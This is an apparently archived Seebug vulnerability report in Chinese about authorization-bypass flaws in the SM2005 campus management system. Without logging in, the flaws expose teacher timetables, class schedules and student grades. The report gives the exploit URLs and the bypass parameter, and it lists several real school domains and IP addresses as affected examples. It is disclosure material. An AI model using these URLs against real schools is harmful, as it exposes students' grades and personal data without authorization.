某通用型校园系统多处系统越权

2015-02-16T00:00:00
ID SSV:95854
Type seebug
Reporter Root
Modified 2015-02-16T00:00:00

Description

简要描述:

见详情

详细说明:

漏洞证明:

看乌云别人提交,看了下: 关键字:SM2005/ 多处越权: 第一处:无需登陆可查看任意教师,任意学期的班级课表 漏洞位置:SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb 案例如下: http://www.sdwhys.com/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb http://www.zjnksyzx.com:8801/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb http://www.lcxyz.com:21245/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb http://www.suyaxing.com:81/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb http://www.hwsyxx.com/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb http://www.dlwsxx.com/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb 以http://221.203.169.188/SM2005/student/StuKB/TeaKB.asp?sYanzheng=suyaxingweb为例:

<img src="https://images.seebug.org/upload/201502/1111173540ca698ad40a277043c81f6c64f7f000.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

第二处:无需登陆可查看任意学生成绩(有身份证号码前提) 漏洞位置:http://58.56.38.170/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb 案例: http://www.sdwhys.com/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb http://www.zjnksyzx.com:8801/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb http://www.lcxyz.com:21245/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb http://www.suyaxing.com:81/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb http://www.hwsyxx.com/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb http://www.dlwsxx.com/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb 如:http://58.56.38.170/SM2005/student/StuCJ/StuScoreQuery.asp?sYanzheng=suyaxingweb

<img src="https://images.seebug.org/upload/201502/11111808a48c902c918df9562ce18641271afb5c.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

第三处:无需登陆可查看任意班级课表信息 漏洞位置:SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb 案例: http://www.sdwhys.com/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb http://www.zjnksyzx.com:8801/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb http://www.lcxyz.com:21245/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb http://www.suyaxing.com:81/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb http://www.hwsyxx.com/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb http://www.dlwsxx.com/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb 等 如:http://218.26.67.184:8080/SM2005/student/StuKB/ClassKB.asp?sYanzheng=suyaxingweb

<img src="https://images.seebug.org/upload/201502/1111184419da9c0ad400551d9a11ac01efdcf9bb.png" alt="1.png" width="600" onerror="javascript:errimg(this);">